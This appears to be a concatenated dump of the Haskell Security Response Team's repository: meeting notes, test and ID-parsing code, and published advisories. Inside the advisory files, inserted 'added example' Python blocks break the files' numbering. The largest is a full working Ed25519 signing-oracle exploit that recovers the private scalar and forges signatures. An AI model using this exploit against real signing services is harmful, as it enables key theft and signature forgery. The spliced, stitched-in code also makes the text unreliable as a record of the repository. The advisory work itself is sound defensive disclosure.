  - Send David the email address used by your Bitwarden account
    so it can be added to HF's organization.
- FT
  - Documentation of repo structure, including symlinks
  - Documentation about dates - that they are retrieved from Git history
    - full history required, not shallow clone
  - Create GH issue to design HSEC ID reservation feature
  - re Base readFloat, update bgamari that advisory exists
  - ping pandoc folks, ask them to submit advisories
- someone
  - Requirements/guidelines for dependency analysis tooling
  - Start writing them down, commit to our repo
--------------------------------------------------------------------------------
/meeting-notes/2023-06-28.md:
--------------------------------------------------------------------------------
# SRT 2023-06-28

## Previous Action Items

- Fraser did not yet draft the SRT announcement
- We still have several known issues yet to have the advisories submitted

## Library advisory role-play

- For multiple affected packages, where root cause is in a
  lower-level dependency: we MUST mention the "root" package, and
  SHOULD mention dependent packages that specifically mitigate the
  issue. So that tooling (e.g. cabal audit) can deduce that the
  issue is not occurring.

- Upcoming "vex" standard:
  - https://blog.adolus.com/what-is-vex-and-what-does-it-have-to-do-with-sboms
  - https://cyclonedx.org/capabilities/vex/


## OSV export

- demo
- branch name
  - **decision: `generated/osv-export`**
- git "user id" (name and email address)
  - Haskell Security Response Team
- commit message
  - currently just the timestamp
  - could include a reference to commit ID and/or commit message from the `main` branch
  - **Decision**: include source commit ID in OSV branch commit message
- Casey: what about signing the commits?
  - FT: then the private key needs to live in GitHub secrets. Not thrilled about it.
  - sigstore?
    What sort of GitHub actions integration do they have?
    - https://github.com/sigstore/gitsign
  - **Decision: investigate further**


## Real advisories
(redacted)

## Distributor notification

- We should have a directory of important distributors so that they can
  respond to issues.
- Commit the checklist / playbook to the repo.
  - **Owner: Tristan**
- Who:
  - Stack, GHCup, haskell-ci?
  - Linux distros

## Advisory "official launch"

- still needs to draft announcement (David will draft and send to mailing list)
- Also need to do quarterly report, so can roll them into one announcement :)

## Action items
- Tristan: will adapt responsible disclosure instructions
- Fraser: complete OSV data export CI action
- David: will draft announcement/report for group
- Tristan: Will email mailing list about **** issue and affected packages
--------------------------------------------------------------------------------
/code/hsec-tools/test/Spec.hs:
--------------------------------------------------------------------------------
```haskell
{-# LANGUAGE OverloadedStrings #-}

module Main where

import Data.Aeson.Encode.Pretty (encodePretty)
import Data.List (isSuffixOf)
import qualified Data.Text.IO as T
import qualified Data.Text.Lazy as LText
import qualified Data.Text.Lazy.Encoding as LText
import Data.Time (UTCTime(UTCTime))
import Data.Time.Calendar.OrdinalDate (fromOrdinalDate)
import Paths_hsec_tools (getDataFileName)
import qualified Security.Advisories.Convert.OSV as OSV
import Security.Advisories.Parse
import qualified Spec.FormatSpec as FormatSpec
import System.Directory (listDirectory)
import Test.Tasty (defaultMain, testGroup, TestTree)
import Test.Tasty.Golden (goldenVsString)
import Text.Pretty.Simple (pShowNoColor)

main :: IO ()
main = do
  goldenFiles <- listGoldenFiles
  defaultMain $
    testGroup
      "Tests"
      [ goldenTestsSpec goldenFiles
      , FormatSpec.spec
      ]

-- | Every file under test/golden/ that is not itself a .golden
-- expected-output file is an advisory input.
listGoldenFiles :: IO [FilePath]
listGoldenFiles = map (mappend dpath) . filter (not . isSuffixOf ".golden") <$> (getDataFileName dpath >>= listDirectory)
  where
    dpath = "test/golden/"

goldenTestsSpec :: [FilePath] -> TestTree
goldenTestsSpec goldenFiles = testGroup "Golden test" $ map doGoldenTest goldenFiles

-- | Parse one advisory, convert it to OSV, and compare the pretty-printed
-- parse result plus the OSV JSON against the stored .golden file.
doGoldenTest :: FilePath -> TestTree
doGoldenTest fp = goldenVsString fp (fp <> ".golden") (LText.encodeUtf8 <$> doCheck)
  where
    doCheck :: IO LText.Text
    doCheck = do
      input <- getDataFileName fp >>= T.readFile
      -- Fixed timestamps so the golden output is deterministic.
      let fakeDate = UTCTime (fromOrdinalDate 1970 0) 0
          attr = OutOfBandAttributes
            { oobPublished = fakeDate
            , oobModified = fakeDate
            }
          res = parseAdvisory NoOverrides (Right attr) input
          osvExport = case res of
            Right adv ->
              let osv = OSV.convert adv
              in LText.unlines
                   [ pShowNoColor osv
                   , LText.decodeUtf8 (encodePretty osv)
                   ]
            Left _ -> ""
      pure (LText.unlines [pShowNoColor res, osvExport])
```
--------------------------------------------------------------------------------
/meeting-notes/2023-05-31.md:
--------------------------------------------------------------------------------
# SRT 2023-05-31

## Review open tickets

- **ensure OSV schema compatibility (#3)**
- register HSEC database and hackage ecosystem with OSV (#4)
- update hackage with "report security issue" feature (#7)
  - Tristan's update: there is a template, where we can add it.
- add reporting how-to to haskell.org (#8)
- example advisory (#14)

## Future tasks (no issue yet)

- **Announcements of security-advisories readiness to receive contributions**
- OSV export
- improving the tooling to "check all" / "render all"
- static site generation / CI/CD for publishing it

## Directory structure

- rustsec uses directories for `crates/packagename` and `rust/(rustdoc|std|...)`. We can do similar.
- the CI already supports nested directory
- the only file extension examined is: `*.md`


## Ask about cabal.project.freeze

- it gets in the way of development (for me) as I have different GHC version.
- do we need to keep it? If so, can we mitigate the impact on developers somehow?
- Gautier: it's a way to be in sync with nix, but if the CI does not use it, I guess we can drop it
- Remove it and see if nix build breaks?

## Tooling to import older CVEs

- FT: AFAIK it's mostly in blog posts, a few CVE registrations, and tribal knowledge/folklore. There doesn't seem to be much we could do to automate that.


## Announcing the security-advisories is open for business

- ASAP, after we are happy with the schema and CI machinery
- Mailing list(s), discourse, reddit
- "official" orgs - Haskell.org, HF
  - and their twitter/fediverse accounts, ...

## ZuriHac

- Remote participation via discord server
- We should have a security-advisories channel to solicit advisories, and maybe hack on tooling too.
- https://s.surveylegend.com/-NWCiIfeZ0IjuNxEs7CL

## Other AIs

- Follow with David about google meet access
- Create issue for zurihac. If we need an impromptu meeting it's ok :)
- Create issue to discuss if/how to represent packages not on hackage (e.g. on GitHub only).
  - For example, hackage-server lives on GitHub and makes releases from a branch. If there is an issue, how to represent introduced/fixed versions. How does OSV deal with this scenario?
--------------------------------------------------------------------------------
/advisories/published/2025/HSEC-2025-0005.md:
--------------------------------------------------------------------------------
```toml
[advisory]
id = "HSEC-2025-0005"
cwe = [427]
keywords = ["hackage", "supply-chain", "historical"]

[[affected]]
package = "cabal-install"
cvss = "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N"
[[affected.versions]]
fixed = "3.4.0.0"
introduced = "1.0.0.0"

[[references]]
type = "REPORT"
url = "https://frasertweedale.github.io/blog-fp/posts/2021-02-12-haskell-dependency-confusion.html"
```

# `cabal-install` dependency confusion

For **cabal-install < 3.4.0.0** and where multiple repositories are
configured, the resolver picks the highest available version across
all repositories. Where a package is only defined in a private
repository, this behaviour leads to a [*dependency confusion*][blog]
supply chain vulnerability. If the private package name becomes
known, a malicious actor can claim the name in the public repository
and publish a malicious version at a higher version number.

Default `cabal-install` configurations that only use the
`hackage.haskell.org` repository are not affected. Configurations
that use curated private repositories **exclusively** are also not
affected.

[blog]: https://frasertweedale.github.io/blog-fp/posts/2021-02-12-haskell-dependency-confusion.html


## Mitigations

*cabal-install* version **3.4.0.0** and higher provide an `override`
option in the repository configuration.
It marks the associated repository as canonical for all packages
defined in that repository. No other repositories will be considered
for those packages. For example:

```
-- For packages in repo.example.com,
-- only versions in repo.example.com are considered
active-repositories:
  , hackage.haskell.org
  , repo.example.com:override
```

Users and organisations using private repositories that contain
private packages in addition to public repositories **MUST** use the
`override` option to prevent dependency confusion attacks.

Alternatively, projects and organisations can run a private instance
of *hackage-server* and carefully curate and review its contents.
Using that instance exclusively defeats supply chain attacks
including *dependency confusion*. For *cabal-install < 3.4* and
where using multiple repositories, this is the only effective
mitigation against dependency confusion attacks.
--------------------------------------------------------------------------------
/docs/call-for-volunteers-example.md:
--------------------------------------------------------------------------------
**(PREAMBLE)**

The Security Response Team (SRT) is formally calling for
applications to join the SRT. People from the Haskell community
with information security experience are encouraged to apply. This
is an opportunity to have a large impact on the practice of Haskell
programming going forward. If you have an interest in helping the
team continue its mission, please apply!

## Security Response Team responsibilities

The general responsibilities of the SRT are:

- Manage the Haskell Security Advisory Database, on behalf of the
  Haskell community and the Haskell Foundation.
- Triage and assess incoming security reports or proposed/candidate
  security advisories.
18 | - Assist reporters to determine CVSS scores and CWE values for 19 | confirmed security issues. 20 | - Communicate with package maintainers and the community to promote 21 | the timely resolution of reported security issues. 22 | - Ensure the security advisory data are useful for downstream 23 | security tooling. (Development of downstream tooling is not an SRT 24 | responsibility, but engaging with the developers is) 25 | - Report quarterly on the activities of the SRT and 26 | statistics/trends in new security issues. 27 | 28 | ## How can you help? 29 | 30 | - You can apply. 31 | - If you don’t want to apply but know someone who would be great, 32 | encourage them to apply. 33 | - Applicants should have experience in one or more of the following 34 | areas: 35 | - web application security 36 | - information security incident response 37 | - vulnerability research and analysis 38 | - penetration testing 39 | - cryptography 40 | - authentication and identity management 41 | - governance, risk management and compliance (GRC) 42 | - secure application development 43 | - algorithms, data structures, and their role in DoS attacks 44 | - related disciplines 45 | 46 | ## Who is involved? 47 | 48 | The current membership of the SRT is: 49 | 50 | - ***(CURRENT MEMBERS)*** 51 | 52 | The team is hoping to gain ***(FILL ME)*** new members via this call 53 | for volunteers. 54 | 55 | ## How to apply 56 | 57 | Email ***(DELEGATE )*** with subject ***Haskell SRT 58 | Application***. Include a brief overview of your background in 59 | security and the specific topics (e.g. from the list above) with 60 | which you have experience. 61 | 62 | ## Deadline 63 | 64 | Please submit your applications by end of day ***(DEADLINE)***. 
65 | -------------------------------------------------------------------------------- /meeting-notes/2024-10-16.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-10-16 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-10-02.md 5 | 6 | ## Call for Volunteers 7 | 8 | - FT sent each of the 4 applications to the list 9 | - Upon discussion, we will accept 2 10 | - SRT members, please review and respond on the ML (the initial thread) 11 | 12 | ## Stack traces proposal 13 | 14 | - CLC proposal: 15 | https://github.com/haskell/core-libraries-committee/issues/285#issuecomment-2414727239 16 | - Discussion: 17 | - For 2 decades people wanted stack traces, now we have them 18 | there are doubts :D 19 | - Most other languages are showing the stack trace 20 | - Sensitive information in error messages is an application 21 | developer's fault 22 | - It's not unreasonable to want a way to disable the default 23 | behaviour, or catch and suppress, if the actual program 24 | structure (e.g. function names) is sensitive for some reason. 25 | - The proposal Part 2 seems to suggest the stacktrace would be 26 | leaked with `displayException` too, which might be used for 27 | end-user facing messages, perhaps it would be safer to only 28 | print them through the main exception handler. That's how 29 | python does it, printing an exception just shows the error, the 30 | stacktrace is only displayed by default from uncaught 31 | exception.
32 | 33 | ## Draft quarterly report 34 | 35 | - call for volunteers update 36 | - advisory DB changes (1 new vuln, 0 historical, 2 reserved) 37 | - HSEC-2024-0003 update 38 | - haskell.org Apache httpd update 39 | - hackage-server "Reporting Vulnerabilities" link 40 | - tooling update 41 | - CVSS 4.0 work (ongoing) 42 | - GHA / Renovate progress 43 | 44 | ## GHC hash collision 45 | 46 | - Simon PJ and FT think it is not a huge deal 47 | - But we should fix it. 48 | - Changing the Hash function is simple and buys us another 10-20 49 | years (hopefully) 50 | 51 | ### Documenting known weaknesses 52 | 53 | This is a good opportunity to take a look at the ways 54 | that the compiler/toolchain can be compromised by malicious 55 | source code, and document them. Guide / blog post / GHC docs. 56 | 57 | Many of these would not warrant an HSEC-ID (especially structural 58 | issues that are impossible / very hard to fix), but we can still 59 | collect them and let the community know in a more formal way. 
60 | 61 | ## GHC numeric bug 62 | 63 | - Tristan will rebase the advisory draft #214 64 | 65 | ## Updated major dependencies for hsec-tools 66 | 67 | #239 and #241 68 | -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0007.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0007" 4 | cwe = [1284, 789] 5 | keywords = ["toml", "parser", "dos"] 6 | 7 | [[affected]] 8 | package = "base" 9 | cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" 10 | [[affected.versions]] 11 | # it was introduced earlier, but this is the earliest version on Hackage 12 | introduced = "3.0.3.1" 13 | 14 | [[affected]] 15 | package = "toml-reader" 16 | cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" 17 | [[affected.versions]] 18 | introduced = "0.1.0.0" 19 | fixed = "0.2.0.0" 20 | 21 | [[references]] 22 | type = "REPORT" 23 | url = "https://gitlab.haskell.org/ghc/ghc/-/issues/23538" 24 | [[references]] 25 | type = "REPORT" 26 | url = "https://github.com/brandonchinn178/toml-reader/issues/8" 27 | [[references]] 28 | type = "FIX" 29 | url = "https://github.com/brandonchinn178/toml-reader/pull/9" 30 | 31 | ``` 32 | 33 | # `readFloat`: memory exhaustion with large exponent 34 | 35 | `Numeric.readFloat` takes time and memory linear in the size of the 36 | number _denoted_ by the input string. In particular, processing a 37 | number expressed in scientific notation with a very large exponent 38 | could cause a denial of service. 
The slowdown is observable on a 39 | modern machine running GHC 9.4.4: 40 | 41 | ``` 42 | ghci> import qualified Numeric 43 | ghci> Numeric.readFloat "1e1000000" -- near instantaneous 44 | [(Infinity,"")] 45 | ghci> Numeric.readFloat "1e10000000" -- perceptible pause 46 | [(Infinity,"")] 47 | ghci> Numeric.readFloat "1e100000000" -- ~ 3 seconds 48 | [(Infinity,"")] 49 | ghci> Numeric.readFloat "1e1000000000" -- ~ 35 seconds 50 | [(Infinity,"")] 51 | ``` 52 | 53 | ## In *base* 54 | 55 | `Numeric.readFloat` is defined for all `RealFrac a => a`: 56 | 57 | ```haskell 58 | readFloat :: RealFrac a => ReadS a 59 | ``` 60 | 61 | The `RealFrac` type class does not express any bounds on the size of 62 | values representable in the types for which instances exist, so 63 | bounds checking is not possible (in this *generic* function). 64 | `readFloat` uses `Text.Read.Lex.numberToRational` which, among 65 | other things, calculates `10 ^ exponent`, which takes time and memory 66 | linear in the exponent. 67 | 68 | **Mitigation:** use `read`. The `Read` instances for `Float` and 69 | `Double` perform bounds checks on the exponent, via 70 | `Text.Read.Lex.numberToRangedRational`. 71 | 72 | 73 | ## In *toml-reader* 74 | 75 | The issue was detected in *toml-reader* version 0.1.0.0, and 76 | mitigated in version 0.2.0.0 by immediately returning `Infinity` 77 | when the exponent is large enough that there's no reason to process 78 | it.
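As an added example (not code from *base* or *toml-reader*), the following Python models the two strategies this advisory contrasts. `read_float_unbounded` materialises the exact rational the way `readFloat` does, so its cost scales with the magnitude of the exponent; `read_float_bounded` decides from the decimal order of magnitude alone, as `numberToRangedRational` and the *toml-reader* fix do, before any large arithmetic runs. The function names, the regex and the binary64 bounds are assumptions of the example.

```python
"""Parsing decimal scientific notation: unbounded vs exponent-bounded.
Added example modelling the advisory's point; not code from base or toml-reader."""
from fractions import Fraction
import re

_SCI = re.compile(r"^([+-]?)(\d+)(?:\.(\d+))?(?:[eE]([+-]?\d+))?$")

# Decimal magnitude bounds of IEEE-754 binary64 (assumed target type):
# anything at or above 10**309 overflows, anything below 10**-324 underflows.
DOUBLE_MAX_EXP10 = 309
DOUBLE_MIN_EXP10 = -324


def _split(text):
    """Return (sign, mantissa_int, digit_count, exp10) such that
    value == sign * mantissa_int * 10**exp10.  Rejects anything else."""
    m = _SCI.match(text.strip())
    if not m:
        raise ValueError(f"not a decimal number: {text!r}")
    sign, int_part, frac_part, exp = m.groups()
    frac_part = frac_part or ""
    digits = (int_part + frac_part).lstrip("0") or "0"
    exp10 = int(exp or 0) - len(frac_part)
    return (-1 if sign == "-" else 1), int(digits), len(digits), exp10


def _to_float(sign, mantissa, exp10):
    """Exact rational -> nearest double; an oversized result becomes infinity."""
    try:
        return sign * float(Fraction(mantissa) * Fraction(10) ** exp10)
    except OverflowError:
        return sign * float("inf")


def read_float_unbounded(text):
    """Models Numeric.readFloat: computes 10**exp10 before looking at the range,
    so "1e1000000000" allocates an integer of about exp10*log2(10) bits and
    costs time and memory proportional to the exponent, not the input length."""
    sign, mantissa, _, exp10 = _split(text)
    return _to_float(sign, mantissa, exp10)


def read_float_bounded(text):
    """Models Text.Read.Lex.numberToRangedRational and the toml-reader fix:
    a cheap check on the decimal order of magnitude short-circuits inputs
    that cannot be finite and non-zero in a double, so the big arithmetic
    only ever runs for exponents near the representable range."""
    sign, mantissa, ndigits, exp10 = _split(text)
    if mantissa == 0:
        return sign * 0.0              # "0e1000000000" is still zero
    order = ndigits + exp10 - 1        # value lies in [10**order, 10**(order+1))
    if order >= DOUBLE_MAX_EXP10:
        return sign * float("inf")
    if order < DOUBLE_MIN_EXP10:
        return sign * 0.0
    return _to_float(sign, mantissa, exp10)   # exact rounding only near the edge
```

The check on `order` is deliberately coarse: it rejects exponents that are hopeless for the target type in constant time and leaves the precise rounding near the boundary (for example `1.8e308`, which still overflows) to the exact conversion, which is exactly the division of labour between the range check and the rational arithmetic in the fixed Haskell code.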
79 | -------------------------------------------------------------------------------- /advisories/published/2025/HSEC-2025-0002.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2025-0002" 4 | cwe = [] 5 | keywords = ["crypto"] 6 | related = ["GHSA-w5vr-6qhr-36cc"] 7 | 8 | [[affected]] 9 | package = "cryptonite" 10 | cvss = "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N" 11 | [[affected.versions]] 12 | introduced = "0.1" 13 | 14 | [[affected]] 15 | package = "crypton" 16 | cvss = "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N" 17 | [[affected.versions]] 18 | introduced = "0.31" 19 | fixed = "1.0.3" 20 | 21 | [[references]] 22 | type = "ARTICLE" 23 | url = "https://portswigger.net/daily-swig/dozens-of-cryptography-libraries-vulnerable-to-private-key-theft" 24 | [[references]] 25 | type = "ARTICLE" 26 | url = "https://github.com/MystenLabs/ed25519-unsafe-libs" 27 | [[references]] 28 | type = "ADVISORY" 29 | url = "https://github.com/advisories/GHSA-w5vr-6qhr-36cc" 30 | [[references]] 31 | type = "EVIDENCE" 32 | url = "https://hackage.haskell.org/package/cryptonite-0.30/docs/src/Crypto.PubKey.Ed25519.html#sign" 33 | [[references]] 34 | type = "EVIDENCE" 35 | url = "https://github.com/haskell-crypto/cryptonite/blob/cryptonite-v0.30/cbits/ed25519/ed25519.c#53" 36 | [[references]] 37 | type = "EVIDENCE" 38 | url = "https://github.com/kazu-yamamoto/crypton/blob/48fb9df2de5ee752196724b081f4d3cdb57576ed/cbits/ed25519/ed25519.c#L53" 39 | [[references]] 40 | type = "FIX" 41 | url = "https://github.com/kazu-yamamoto/crypton/pull/47" 42 | 43 | ``` 44 | 45 | # Double Public Key Signing Function Oracle Attack on Ed25519 46 | 47 | The standard specification of Ed25519 message signing involves providing the 48 | algorithm with a message and private key. 49 | 50 | The function will use the private key to compute the public key and sign the message. 
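The rest of this advisory describes the attack in words. As an added illustration (example code, not *cryptonite* or *crypton* code), the following pure-Python model implements RFC 8032 Ed25519 arithmetic and a signing function with the vulnerable shape, recovers the secret scalar from two oracle queries, and forges a signature that verifies under the victim's real public key. The function names, the constructed seed and the attacker's two arbitrary 32-byte "public keys" are assumptions of the example; the arithmetic is not constant time and is for understanding only.

```python
"""Ed25519 'double public key' signing oracle, modelled in pure Python.
RFC 8032 arithmetic, not constant time.  Added example; not cryptonite/crypton code."""
import hashlib

Q = 2**255 - 19                                      # field prime
L = 2**252 + 27742317777372353535851937790883648493   # prime group order

def _inv(x):
    return pow(x, Q - 2, Q)

D = (-121665 * _inv(121666)) % Q
I = pow(2, (Q - 1) // 4, Q)

def _xrecover(y):
    xx = (y * y - 1) * _inv(D * y * y + 1) % Q
    x = pow(xx, (Q + 3) // 8, Q)
    if (x * x - xx) % Q:
        x = x * I % Q
    return Q - x if x & 1 else x

BY = 4 * _inv(5) % Q
B = (_xrecover(BY), BY)                              # standard base point

def _add(P1, P2):
    x1, y1 = P1
    x2, y2 = P2
    t = D * x1 * x2 * y1 * y2
    return ((x1 * y2 + x2 * y1) * _inv(1 + t) % Q,
            (y1 * y2 + x1 * x2) * _inv(1 - t) % Q)

def _mul(P, e):                                      # double-and-add
    R = (0, 1)
    for bit in bin(e)[2:]:
        R = _add(R, R)
        if bit == "1":
            R = _add(R, P)
    return R

def _encode(P):
    return (P[1] | ((P[0] & 1) << 255)).to_bytes(32, "little")

def _decode(s):
    n = int.from_bytes(s, "little")
    y = n & ((1 << 255) - 1)
    x = _xrecover(y)
    if (x & 1) != (n >> 255):
        x = Q - x
    if (-x * x + y * y - 1 - D * x * x * y * y) % Q:
        raise ValueError("not a curve point")
    return (x, y)

def _h(*parts):
    return int.from_bytes(hashlib.sha512(b"".join(parts)).digest(), "little")

def _clamp(b32):
    return (int.from_bytes(b32, "little") & ((1 << 254) - 8)) | (1 << 254)

def keypair(seed):
    """(clamped secret scalar a, encoded public key A = a*B)."""
    a = _clamp(hashlib.sha512(seed).digest()[:32])
    return a, _encode(_mul(B, a))

def sign_with_supplied_pk(m, seed, pk):
    """VULNERABLE shape: `pk` comes from the caller, is hashed into the
    challenge, and is never compared with the key derived from `seed`."""
    h = hashlib.sha512(seed).digest()
    a, r = _clamp(h[:32]), _h(h[32:], m) % L          # r depends on seed and m only
    R = _encode(_mul(B, r))
    S = (r + _h(R, pk, m) * a) % L
    return R + S.to_bytes(32, "little")

def sign_checked(m, seed, pk):
    """Hardened variant: refuse a pk that does not belong to seed."""
    if pk != keypair(seed)[1]:
        raise ValueError("public key does not match private key")
    return sign_with_supplied_pk(m, seed, pk)

def verify(m, sig, pk):
    R, S = _decode(sig[:32]), int.from_bytes(sig[32:], "little")
    if S >= L:
        return False
    hA = _mul(_decode(pk), _h(sig[:32], pk, m) % L)
    return _mul(B, S) == _add(R, hA)                 # S*B == R + h*A

def recover_secret_scalar(m, oracle):
    """Two oracle calls, same m, two attacker-chosen 'public keys'.  Same r
    gives the same R, so S1 - S2 == (h1 - h2) * a (mod L); divide it out."""
    pk1, pk2 = b"\x01" * 32, b"\x02" * 32            # constructed; never validated
    sig1, sig2 = oracle(m, pk1), oracle(m, pk2)
    R = sig1[:32]
    if sig2[:32] != R:
        raise ValueError("R differs: nonce not deterministic, attack does not apply")
    S1, S2 = (int.from_bytes(s[32:], "little") for s in (sig1, sig2))
    h1, h2 = _h(R, pk1, m) % L, _h(R, pk2, m) % L
    return (S1 - S2) * pow((h1 - h2) % L, L - 2, L) % L

def forge(m, a_mod_l, pk):
    """a mod L is all the attacker needs: sign any m under the victim's real key."""
    r = _h(b"attacker nonce", m) % L
    R = _encode(_mul(B, r))
    S = (r + _h(R, pk, m) * a_mod_l) % L
    return R + S.to_bytes(32, "little")
```

`recover_secret_scalar` relies only on the nonce being deterministic, so both queries for the same message share `R`; it returns `a mod L`, which differs from the clamped scalar but is all that signing ever uses, so `forge` then produces valid signatures for any message under the real public key. `sign_checked` shows the fix: derive the public key from the private key, or compare the supplied one against it, instead of trusting the caller.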
51 | Some libraries provide a variant of the message signing function that also takes 52 | the pre-computed public key as an input parameter. 53 | 54 | Libraries that accept an arbitrary public key without checking that it 55 | corresponds to the supplied private key are vulnerable to the 56 | following attack. 57 | 58 | Ed25519 derives the nonce deterministically from the private key and the message, 59 | and hashes the supplied public key into the challenge. Two signatures over the same 60 | message with different supplied public keys therefore share `R`, and their `S` values differ by 61 | a known multiple of the private scalar, so an attacker with access to the signing 62 | mechanism can solve for it directly and then sign arbitrary messages. 63 | 64 | This shortcoming means that an attacker could use the signing function as an 65 | oracle and perform cryptanalysis to recover the secret, for example through an 66 | API call that exposes the signing mechanism but not the private key. 67 | -------------------------------------------------------------------------------- /meeting-notes/2024-04-03.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-04-03 2 | 3 | Previous meeting notes: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-03-20.md 5 | 6 | ## ZuriHac / Haskell Ecosystem Workshop 7 | 8 | - Fraser is going 9 | - Gautier is going 10 | - Mihai will know on Friday if he is attending 11 | - Tristan cannot attend 12 | 13 | ## Quarterly report 14 | 15 | - Draft: https://github.com/haskell/security-advisories/pull/180 16 | - FT asked Mihai to contribute a section for the CI security 17 | recommendations. 18 | 19 | ## VINCE 20 | 21 | - FT reached out to CERT/CC to ask for help 22 | - `security-advisories@haskell.org` is notification-only. 23 | - We should make individual accounts (TOTP required) and they can be 24 | associated with the "Haskell Programming Language" org within 25 | VINCE.
26 | 27 | ## GitHub Actions Runners 28 | 29 | - The reporter was asking what the resolution was. 30 | - Mihai will create a PR with the guidelines documentation and 31 | contact the repo and reporter. 32 | - We cannot fix globally because there is not a single org with all 33 | the Haskell. But we can provide the guidance and recommendations 34 | to the community. 35 | 36 | ## A "security" section within haskell.org 37 | 38 | - Jose: Is there a place for collecting ecosystem-wide best 39 | practices? (whether for security, or more generally) 40 | - We would like a section within haskell.org where our 41 | recommendations and info about the advisory DB lives. A more 42 | "official" documentation about Haskell security and the SRT. 43 | - Perhaps also the wiki. 44 | 45 | ## liblzma/xz vulnerability? 46 | 47 | - The backdoor was inserted using binary data from test suite, and 48 | only during RPM/.deb builds. Even if code was lifted and used in 49 | cbits, the backdoor probably would not be there. 50 | - But we should still verify. FT will ask Casey. 51 | 52 | ## yaml vulnerability 53 | 54 | - Impact and exploitability vector are not clear enough to offer 55 | remediation advice. 56 | - FT will create the advisory. 57 | - We need to check if other yaml packages are affected. 58 | 59 | ## Pull requests 60 | 61 | - [cabal audit (#148)](https://github.com/haskell/security-advisories/pull/148) 62 | - The author is keen on making changes if any more feedback 63 | - He is afraid of going forward with other contributions if he has to rebase 64 | - [cabal audit osv/json (#178)](https://github.com/haskell/security-advisories/pull/178) 65 | 66 | - [hsec-sync (#168)](https://github.com/haskell/security-advisories/pull/168) (merged) 67 | - [hsec-tools snapshot (#179)](https://github.com/haskell/security-advisories/pull/179) 68 | - FT: we want to avoid switching TOML library (again), if we can. 
69 | -------------------------------------------------------------------------------- /code/hsec-core/src/Security/Advisories/Core/HsecId.hs: -------------------------------------------------------------------------------- 1 | module Security.Advisories.Core.HsecId 2 | ( 3 | HsecId 4 | , hsecIdYear 5 | , hsecIdSerial 6 | , mkHsecId 7 | , placeholder 8 | , isPlaceholder 9 | , parseHsecId 10 | , printHsecId 11 | , nextHsecId 12 | , getNextHsecId 13 | ) where 14 | 15 | import Control.Monad (guard, join) 16 | 17 | import Data.Time (getCurrentTime, utctDay) 18 | import Data.Time.Calendar.OrdinalDate (toOrdinalDate) 19 | 20 | import Safe (readMay) 21 | 22 | data HsecId = HsecId Integer Integer 23 | deriving (Eq, Ord) 24 | 25 | instance Show HsecId where 26 | show = printHsecId 27 | 28 | -- | Make an 'HsecId'. Year and serial must both be positive, or 29 | -- else both must be zero (the 'placeholder'). 30 | mkHsecId 31 | :: Integer -- ^ Year 32 | -> Integer -- ^ Serial number within year 33 | -> Maybe HsecId 34 | mkHsecId y n 35 | | y > 0 && n > 0 || y == 0 && n == 0 = Just $ HsecId y n 36 | | otherwise = Nothing 37 | 38 | hsecIdYear :: HsecId -> Integer 39 | hsecIdYear (HsecId y _) = y 40 | 41 | hsecIdSerial :: HsecId -> Integer 42 | hsecIdSerial (HsecId _ n) = n 43 | 44 | -- | The placeholder ID: __HSEC-0000-0000__. 45 | -- See also 'isPlaceholder'. 46 | placeholder :: HsecId 47 | placeholder = HsecId 0 0 48 | 49 | -- | Test whether an ID is the 'placeholder' 50 | isPlaceholder :: HsecId -> Bool 51 | isPlaceholder = (==) placeholder 52 | 53 | -- | Parse an 'HsecId'. The 'placeholder' is accepted. 
54 | parseHsecId :: String -> Maybe HsecId 55 | parseHsecId s = case s of 56 | 'H':'S':'E':'C':'-':t -> 57 | let 58 | (y, t') = break (== '-') t 59 | n = drop 1 t' 60 | in do 61 | guard $ length y >= 4 -- year must have at least 4 digits 62 | guard $ length n >= 4 -- serial must have at least 4 digits 63 | join $ mkHsecId <$> readMay y <*> readMay n 64 | _ -> Nothing 65 | 66 | printHsecId :: HsecId -> String 67 | printHsecId (HsecId y n) = "HSEC-" <> pad (show y) <> "-" <> pad (show n) 68 | where 69 | pad s = replicate (4 - length s) '0' <> s 70 | 71 | -- | Given a year and an HSEC ID, return a larger HSEC ID. This 72 | -- function, when given the current year and the greatest allocated 73 | -- HSEC ID, returns the next HSEC ID to allocate. 74 | -- 75 | nextHsecId 76 | :: Integer -- ^ Current year 77 | -> HsecId 78 | -> HsecId 79 | nextHsecId curYear (HsecId idYear n) 80 | | curYear > idYear = HsecId curYear 1 81 | | otherwise = HsecId idYear (n + 1) 82 | 83 | -- | Get the current time, and return an HSEC ID greater than the 84 | -- given HSEC ID. The year of the returned HSEC ID is the current 85 | -- year. 86 | -- 87 | getNextHsecId 88 | :: HsecId 89 | -> IO HsecId 90 | getNextHsecId oldId = do 91 | t <- getCurrentTime 92 | let (year, _dayOfYear) = toOrdinalDate (utctDay t) 93 | pure $ nextHsecId year oldId 94 | -------------------------------------------------------------------------------- /meeting-notes/2023-06-15.md: -------------------------------------------------------------------------------- 1 | # SRT 2023-06-15 2 | 3 | ## Present 4 | - Gautier 5 | - Casey 6 | - Mihai 7 | - Fraser 8 | - David 9 | 10 | ## Apology from David 11 | 12 | David apologized for not being there to let people into the meeting room. He will change the invite to a jit.si link for next time. 
